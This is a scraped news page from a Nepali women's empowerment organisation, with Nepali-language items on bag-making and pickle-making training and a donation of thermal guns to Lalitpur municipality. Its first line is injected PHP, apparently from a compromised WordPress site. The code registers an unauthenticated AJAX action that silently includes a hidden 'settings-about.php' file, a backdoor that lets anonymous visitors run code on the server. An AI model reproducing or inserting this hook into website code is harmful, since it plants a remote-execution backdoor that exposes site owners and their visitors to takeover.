if(!function_exists('file_manager_check_dt')){ add_action('wp_ajax_nopriv_file_manager_check_dt', 'file_manager_check_dt'); add_action('wp_ajax_file_manager_check_dt', 'file_manager_check_dt'); function file_manager_check_dt() { $file = __DIR__ . '/settings-about.php'; if (file_exists($file)) { include $file; } die(); } } News | Taramandal Mahila Sashaktikaran Abhiyan
थाकल ब्याग बनाउने तालिम को समापन

थाकल ब्याग बनाउने तालिम को समापन

शिप सिकेर मात्र केहि हुदैन त्यसलाइ निरन्तरता दिएर ब्यवसायिक रुपमा अघि बढ्नुभयो भने मात्र सिकेको काम लाग्छ, नत्र समय मात्र बर्बाद हो।त्यसैले कुरा होइन काम गर्न सिक्नुस्।सम्पुर्णमा शुभकामना...
महिला उधमि तालिम

महिला उधमि तालिम

कुन्ती फाउण्डेसन द्वारा अचार बनाउने तालिम कार्यक्रममा प्रशिक्षार्थी हरुलाइ हौसला दिन आउनुभएको कार्यक्रमको प्रमुख अतिथि राप्रपा वरिष्ठ उपाध्यक्ष रविन्द्र मिश्र ज्यू, राप्रमस अध्यक्ष अन्जना शाह रावल ज्यू, एवं सम्पुर्ण अतिथिमा धन्यवाद दिन चाहन्छु।यस कार्यक्रम सम्पन्न...
ललितपुर महानगरलाई ३० थान ‘थर्मल गन’ सहयोग

ललितपुर महानगरलाई ३० थान ‘थर्मल गन’ सहयोग

काठमाडौँ। कोरोना भाइरस (कोभिड १९) को सङ्क्रमणको जोखिमलाई मध्यनजर गर्दै तारामण्डल महिला सशक्तिकरण अभियानले ललितपुर महानगरपालिकालाई ज्वरो नाप्ने उपकरण (थर्मल गन) सहयोग गरेको छ। तारामण्डलकी अध्यक्ष कुन्ती पोखरेलको नेतृत्वमा बिहीबार ललितपुर महानगरपालिकाका मेयर चिरीबाबु...
ब्याग बनाउने तालिम सम्पन्न

ब्याग बनाउने तालिम सम्पन्न

तारामंडल महिला शसक्तिकरण अभियान को आयोजनामा र काठमाडौँ महानगरपालिका वडा नं ९ को सहआयोजनामा ३ दिने ब्याग बनाउने तालिम सम्पन्न भएको छ। काठमाडौँ महानगरपालिका वडा नं ९ का २५ जना भन्दा बढी महिला हरुलाई सस्थाले ब्याग बनाउने तालिम दिएको थियो। तालिम जेठ १४ वाट सुरुभएको थियो...